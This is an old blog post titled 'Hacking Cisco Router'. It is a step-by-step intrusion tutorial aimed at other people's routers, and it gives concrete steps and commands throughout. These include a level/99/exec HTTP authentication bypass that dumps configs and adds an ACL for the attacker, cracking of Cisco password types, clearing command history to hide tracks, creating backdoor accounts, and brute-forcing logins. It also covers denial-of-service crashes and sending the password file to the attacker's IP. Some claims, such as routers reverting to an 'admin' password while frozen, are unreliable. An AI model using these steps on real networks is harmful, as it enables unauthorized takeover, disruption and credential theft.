Friday, August 27, 2010

Hacking Cisco Router

Router is a layer 3 device used for LAN and WAN communications(Mainly used for WAN communication). It performs function on network layer of OSI model. It uses IP addresses to send and receive information on network.
This topic will be easier for those readers who have some experience on routers. If you don't have any experience on routers then you may find this topic weird.
Why we want to hack Cisco routers ?
Reason is that cisco is microsoft of routers. 60% of routers in world are Cisco's.
Router are powerful devices with great speed, so if you get control over a router then you can use it for many purposes like implementing DoS/DDos attacks, hacking other systems, sniffing traffic. etc.
So our first task in hacking cisco router is to find a cisco router on a network.
Finding a cisco router is a fairly easy task, almost every ISP will route through at least one cisco router. The easiest way to find a cisco router is to run a traceroute from dos (type "tracert" and then the IP address of anyone's computer or website), For eg:
In cmd type the following & hit enter :

tracert www.facebook.com

Instead of facebook.com you can type any website address or IP address. You can trace pretty much anyone because the trace will show all of the computer systems between your computer and their computer. One of these systems will probably have the name "cisco" in it's name. If you find one like this, copy down it's IP address.
Now you have the location of a cisco router, but it may have a firewall protecting it, so you should see if it's being blocked by pinging it a couple times, if you get the ping returned to you, it might not be blocked. Another way is to try to access some of the cisco router's ports, you can do this simply by using telnet, and opening a connection to the router on port 23. If it asks for a password, but no username, you are at the router, but if it wants a username aswell, you are probably at a firewall or it is using some other means of authentication.

Identifying a Cisco Router :

Some administrators configure the router in such a way that it is difficult to recognize it
Routers can be configured to look just like any other system on the network - they can run a web server, an SSH daemon, chargen, and they can even appear to be running multiple X servers. For this reason, they can may often be mistaken as Unix systems.
Probably the easiest and most accurate way of identifying a host on the network as a router is by using Nmap - the venerable port scanner with very accurate OS fingerprinting. A port scan of a typical Cisco router tells us about following:

Interesting ports on router :
7, 9, 13, 19, 23, 79, 2001, 4001, 6001, 9001,

If a login service such as telnet or SSH is accessible, one can simply use a standard telnet client and connect to the appropriate port. A basic Cisco router with ip 10.0.0.1 might look like the following:
C:\> telnet 10.0.0.1
Trying 10.0.0.1...
Connected to 10.0.0.1. Escape character is '^]'.
User Access Verification
Password:

The "User Access Verification" line is a trademark Cisco telnet banner. Of course one can't rely on banners alone, since system administrators sometimes modify them for deceptive reasons. One can change banner by using banner motd command from Global mode of router CLI.

Identifying Vulnerabilities :

Vulnerability scanners typically do a great job in identifying known vulnerabilities, but can often miss significant configuration errors. Nessus 2.0.6 for example, has a list of about 44 community strings to brute-force the SNMP daemon, which maybe enough to catch the usage of common default community strings such as public, and private, but of course can't take into account site-specific strings that might be in use.

Exploiting Vulnerabilities in Cisco IOS :

A vulnerability that affects most Cisco routers (when conditions are right) is the HTTP Configuration Arbitrary Administrative Access Vulnerability. This particular vulnerability should be found by all vulnerability scanners, and is trivial to exploit. It often yields full remote administrative control of the affected router. The attacker's tool of choice is simply a web browser. The attacker will enter the address of router in URL space and hit enter,
for eg: If 10.0.0.1 is router address then the attacker will enter following in URL bar:

http://10.0.0.1

now attacker will get a Login Dialogue box that will ask for username and password for login. Now attacker will click on Cancel button and then the attacker will enter following code as address in URL space:

http:///level/xx/exec/

Where xx is a number between 16 and 99.
For example: Let 10.0.0.1 is router address, the attacker enters the following URL into the address bar:
http://10.0.0.1/level/99/exec/show/config

this command will present the startup configuration of the device. The configuration will look something similar to the following:

=================================================

Current configuration : 1204 bytes
!
version 12.2
no service password-encryption
!
hostname crypto
!
!
enable secret 5 $1$mERr$V3AzF/pAhvRvjIsUimrC8.
enable password ccna
!
username crypt0 7 05331F35754843001754
!
ip ssh version 1
!
interface FastEthernet0/0
ip address 10.0.0.1 255.0.0.0
duplex auto
speed auto
!
interface FastEthernet0/1
no ip address
duplex auto
speed auto
shutdown
!
interface Serial1/0
ip address 200.100.0.1 255.255.255.252
!
interface Serial1/1
no ip address
shutdown
!
interface Serial1/2
no ip address
shutdown
!
interface Serial1/3
no ip address
shutdown
!
router eigrp 50
network 10.0.0.0
network 200.100.0.0
no auto-summary
!
ip classless
ip route 20.0.0.0 255.255.255.192 Serial1/1
ip route 200.100.0.4 255.255.255.252 Serial1/1
ip route 30.0.0.0 255.255.192.0 Serial1/1
ip route 200.100.0.12 255.255.255.252 Serial1/1
ip route 200.100.0.12 255.255.255.252 Serial1/0
ip route 30.0.0.0 255.255.192.0 Serial1/0
ip route 200.100.0.4 255.255.255.252 Serial1/0
ip route 20.0.0.0 255.255.255.192 Serial1/0
ip route 40.0.0.0 255.255.255.240 Serial1/0
ip route 50.0.0.0 255.240.0.0 Serial1/0
ip route 200.100.0.8 255.255.255.252 Serial1/0
!
!
banner motd ^C
hello^C
line con 0
line vty 0 4
password ccnp
login
!
!
end
=============================================

Now we can easily see all the configuration of router. We can study this to hack further in that router.

Cracking the passwords :

There are three methods IOS can use to represent a password in a router config file. They are:
1. Clear Text
2. Vigenere
3. MD5

In case of clear text you will see something like this in configuration:
enable password passwd

Here passwd is the password. Like in above configuration you can see that the clear text password is ccna.

In case of Vigenere you will see something like following in configuration :
enable password 7 104B0718071B17

here 104B0718071B17 is encrypted password.

In case of MD5 you will see something like following:

enable secret 5 $1$yOMG$38ZIcsEmMaIjsCyQM6hya0

Here $1$yOMG$38ZIcsEmMaIjsCyQM6hya0 is encrypted password. For example in above configuration $1$mERr$V3AzF/pAhvRvjIsUimrC8. is the encrypted password.

Now you know all about passwords so lets begin to crack them.
There is a way by which you can easily reset the router password but it needs physical access. So we are not going to discuss it. It is basically done by using Rommn mode of router.
We will discuss the remote ways to crack the passwords.
Now in case of clear text password you don't need to crack anything because password is in clear text already. lol ;-)
In case of Vigenere the password is not strongly encrypted so it can be cracked easily with tool known as GetPass. In this tool you enter the encrypted password and it will return you the clear text password.
now in case of MD5 it is a hectic work. MD5 is one way hash so it is difficult to crack.
So we do a dictionary attack or brute force attack on this password by using tools like

How over it may be not possible to login to router even if you have the login credentials if an ACL is configured on the router. There may be a chance that an ACL is preventing our access to router. So we can create an ACL to grant us access to router. We can use following command. Type the following command as URL :

http://10.0.0.1/level/99/configure/access-list/100/permit/ip/host/10.0.0.2/any/CR

Now in above command 10.0.0.1 is router's IP and 10.0.0.2 is our IP. You need to replace 10.0.0.2 with your machine's IP address.

Now as we have got the access to log in the router. So what to do after you got access to the router ? Now we will discuss several experiments that you can perform on this powerful device.

1. Disable History :
One can know what commands have been typed on router CLI by using show history command. So we need to disable the history. History can be disabled by using following command at router's privilege mode:

terminal history size zero

2. Cracking User accounts :

Some times there are user accounts on router too. It can be seen from configuration file. For example in above configuration file we see a user named crypt0 and the password of his account. Now depending upon the encryption technique used to encrypt password we can crack the password. If it is Vigenere we can use GetPass tool to get clear text password & if it is MD5 we can use tool like Cain & Able to crack the password of that account and then we can change the password of that account too. ;-) We can also create another users on that router.
Following command is used to create a new user. It is typed from global mode of router:

username crypto password test

Here crypto is username and test is password.
In order to delete the account use following command in global mode of router:

no username crypto

Here crypto is username that you want to delete.


3. Brute-Forcing Login Services :

Brute-forcing login services such as Telnet and SSH can be somewhat harder and often noisier, but can also yield positive results for the attacker. One of the first things to do before conducting this type of attack on the router is to determine whether or not the router is using some type of extended authentication like Tacacs or Radius. Though IOS doesn't have any means of natively locking out users after X number of login attempts, lockouts can be enabled when authentication is passed off to another system via Tacacs or Radius. The easiest way to tell if authentication is being passed to another system is to simply connect to the router using a standard Telnet client.

C:\> telnet 10.0.0.1
Trying 10.0.0.1...
Connected to 10.0.0.1. Escape character is '^]'.
User Access Verification
Username:

If the device prompts for a username, you can almost be sure that it is using some form of extended authentication. In this case, Tacacs is implemented and brute-forcing is going to be more difficult, because the attacker will have to guess two variables, both the username and password instead of just the password. If finger is running, usernames can be gathered, but the chances of locking out a legitimate user account will likely stop most attacker from conducting this sort of an attack. Of course, if you have permission to assess the site via "whatever means necessary" you might still want to conduct some brute-forcing up to the lockout threshold. If it is not extended authentication then only password will be asked. If it is determined that extended authorization is not in use, then the attacker can brute-force the Telnet daemon. Brutus is a Windows-based brute-forcing tool that does a number of different protocols, and can be customized for new protocols on the fly. THC's hydra is also an excellent, Unix-based tool that is very capable of brute-forcing a number of different services.

Old Technique of hacking routers :

Cisco routers running v4.1 software will be easily disabled. You simply connect to the router on port 23 through your proxy server, and enter a HUGE password string, something like:
10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv
019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgz
mxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalsk
djfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeiru
tyalskdjfhgzmxncbv019dsk
Now wait, the cisco system might reboot, in which case you can't hack it because it is offline. But it will probably freeze up for a period of 2-10 minutes, which you must use to get in. If neither happens, then it is not running the vulnerable software, in which case you can try several DoS attacks, like a huge ping.
Go to dos and type :

ping -l 65550 10.0.0.1 -t

here 10.0.0.1 is router ip, replace it with the real router ip on which you are performing attack. This will do the same trick for you.
While it is frozen, open up another connection to it from some other proxy, and put the password as "admin", the reason for this is because by default, this is the router's password, and while
it is temporarily disabled, it will revert to it's default state.
Now that you have logged in, you must acquire the password file! The systems run different software, but most will have a prompt like "htl-textil" or something, now type "?" for a list of
commands, you will see a huge list of commands, somewhere in there you will find a transfer command, use that to get the password file of admin (which is the current user) and send it to your own IP address on port 23. But before you do this, set up HyperTerminal to wait for a call from the cisco router. Now once you send the file, HyperTerminal will ask you if you want to accept the file that this machine is sending you, say yes and save it to disk.
Now that you have acquired the password file, you have to break it so you can access the router again. To do this, you can run a program like John the Ripper or Cain & Able on the password file,and you may break it.


Hope you find it useful.

No comments:

Post a Comment